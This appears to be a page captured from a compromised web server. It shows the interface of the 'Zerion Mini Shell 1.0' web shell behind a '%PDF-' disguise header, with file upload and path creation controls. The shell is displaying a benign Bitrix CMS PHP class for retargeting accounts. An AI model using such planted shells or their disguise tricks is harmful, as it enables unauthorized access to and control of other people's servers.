%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/bitrix/www/bitrix/modules/seo/lib/retargeting/
Upload File :
Create Path :
Current File : /home/bitrix/www/bitrix/modules/seo/lib/retargeting/account.php

<?

namespace Bitrix\Seo\Retargeting;

abstract class Account extends BaseApiObject
{
	protected static $listRowMap = array(
		'ID' => 'ID',
		'NAME' => 'NAME',
	);

	public function getProfileCached()
	{
		$profile = $this->getProfile();
		if($profile)
		{

		}

		return $profile;
	}

	/**
	 * @return Response
	 */
	abstract public function getList();

	/**
	 * @return Response
	 */
	abstract public function getProfile();
}

Zerion Mini Shell 1.0